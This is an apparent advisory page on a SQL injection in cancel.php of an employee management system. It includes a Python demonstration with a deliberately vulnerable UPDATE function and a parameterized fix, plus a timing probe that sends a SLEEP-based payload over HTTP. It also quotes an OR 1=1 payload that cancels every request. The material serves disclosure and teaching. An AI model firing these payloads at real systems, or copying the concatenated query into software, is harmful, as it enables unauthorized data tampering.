Code-Projects Employee Management System SQL Injection Vulnerability in Cancel.php

Vulnerability

A SQL injection vulnerability has been identified in Code-Projects Employee Management System version 1.0. The flaw is in the file '370project/cancel.php', where the user-controlled request parameters 'id' and 'token' are concatenated directly into an SQL 'UPDATE' statement instead of being bound as query parameters. The vulnerability is exploitable remotely and has been publicly disclosed.

Impact

Exploitation allows an attacker to alter leave-request statuses, including cancelling requests that do not belong to them. Because the injection point is an 'UPDATE' whose result is not reflected in the response, data extraction would rely on blind techniques (boolean- or time-based inference) rather than direct output. Time-based payloads and other resource-intensive injected expressions also add latency and load on the database, degrading application performance.

Reproduction

To reproduce this vulnerability, send a GET request to 'cancel.php' with the 'id' and 'token' parameters, replacing the value of 'id' with a crafted payload. A time-based blind payload is the simplest confirmation: if the response is delayed by the amount the payload requests, the injected expression was evaluated by the database. The injection occurs when the 'UPDATE' statement is executed, because neither parameter is sanitized or parameterized before being placed in the query.
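As an added example, not code from this advisory or from the Code-Projects project, the following Python script mirrors the described flaw against an in-memory SQLite table: cancel_vulnerable() concatenates 'id' and 'token' into the 'UPDATE' as the advisory describes, cancel_parameterized() is the corrected form, and timing_probe() performs the time-based check from the Reproduction section against any fetch callable (a real HTTP transport to /370project/cancel.php and an offline simulated server are both provided). The leave_requests schema, its column names, the exact 'UPDATE' text, the SLEEP()-based payload and the MySQL backend are all assumptions; the page gives only the file and parameter names.

```python
"""Added example for this advisory; it is not code from Code-Projects or the
Employee Management System. The real cancel.php query text and table layout are
not on the page, so the leave_requests schema, column names and UPDATE shape
below are assumptions chosen to mirror the described flaw."""
import re
import sqlite3
import time
import urllib.request
from typing import Callable, Dict
from urllib.parse import urlencode


def make_db() -> sqlite3.Connection:
    """Constructed sample data: three pending leave requests, each with its own
    cancellation token (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE leave_requests (id INTEGER PRIMARY KEY, "
                 "employee TEXT, token TEXT, status TEXT)")
    conn.executemany("INSERT INTO leave_requests VALUES (?, ?, ?, ?)",
                     [(1, "alice", "tok-a1", "pending"),
                      (2, "bob", "tok-b2", "pending"),
                      (3, "carol", "tok-c3", "pending")])
    conn.commit()
    return conn


def cancel_vulnerable(conn: sqlite3.Connection, id_param: str, token_param: str) -> int:
    """The flaw the advisory describes: both GET values are pasted into the
    UPDATE as text. Returns the number of rows changed."""
    sql = ("UPDATE leave_requests SET status='cancelled' "
           f"WHERE id='{id_param}' AND token='{token_param}'")
    cur = conn.execute(sql)
    conn.commit()
    return cur.rowcount


def cancel_parameterized(conn: sqlite3.Connection, id_param: str, token_param: str) -> int:
    """Hardened form: id is coerced to an integer first, and both values are
    bound with placeholders so the database never parses them as SQL."""
    try:
        req_id = int(id_param)
    except ValueError:
        return 0
    cur = conn.execute("UPDATE leave_requests SET status='cancelled' "
                       "WHERE id=? AND token=?", (req_id, token_param))
    conn.commit()
    return cur.rowcount


def statuses(conn: sqlite3.Connection) -> Dict[int, str]:
    """Current status of every request, keyed by id."""
    return dict(conn.execute("SELECT id, status FROM leave_requests ORDER BY id"))


# A Fetcher performs one GET to cancel.php with the given query parameters;
# the timing probe only cares how long the round trip takes.
Fetcher = Callable[[Dict[str, str]], None]


def http_fetch(base_url: str) -> Fetcher:
    """Real transport against a lab copy, e.g. base_url='http://127.0.0.1:8080'."""
    def fetch(params: Dict[str, str]) -> None:
        url = f"{base_url}/370project/cancel.php?{urlencode(params)}"
        with urllib.request.urlopen(url, timeout=30) as resp:
            resp.read()
    return fetch


def simulated_fetch(vulnerable: bool) -> Fetcher:
    """Constructed stand-in so the probe runs offline: a 'vulnerable' server
    honours a SLEEP(n) found in id, a fixed one ignores it."""
    def fetch(params: Dict[str, str]) -> None:
        m = re.search(r"SLEEP\(([\d.]+)\)", params["id"])
        if vulnerable and m:
            time.sleep(float(m.group(1)))
    return fetch


def timing_probe(fetch: Fetcher, token: str, delay_s: float = 3.0) -> bool:
    """Reproduction check from the advisory: compare a baseline request with one
    whose id carries a time-based payload. MySQL's SLEEP() is assumed (the page
    does not name the backend); because the payload is ANDed with id='1', the
    delay only fires if a request with id 1 exists."""
    baseline = {"id": "1", "token": token}
    injected = {"id": f"1' AND SLEEP({delay_s:g}) -- ", "token": token}
    t0 = time.perf_counter(); fetch(baseline); t_base = time.perf_counter() - t0
    t0 = time.perf_counter(); fetch(injected); t_inj = time.perf_counter() - t0
    # Require most of the requested delay to show up, to ride out network jitter.
    return (t_inj - t_base) >= 0.8 * delay_s
```

With the vulnerable function, an 'id' of `1' OR 1=1 -- ` together with a wrong token cancels every pending request, which is the unauthorized-cancellation impact described above; the parameterized version rejects the same input because it is not an integer. SQLite has no SLEEP(), so the timing probe is exercised against the simulated fetcher; pass http_fetch() instead to run it against a lab instance.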

Added: Apr 27, 2026, 12:19 PM
Updated: Apr 27, 2026, 12:19 PM

Vulnerability Rating

Custom Algorithm

  spread          0.0
  impact          3.8
  exploitability  8.7
  remediation     0.0
  relevance       6.8
  threat          6.4
  urgency         2.9
  incentive       4.2

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.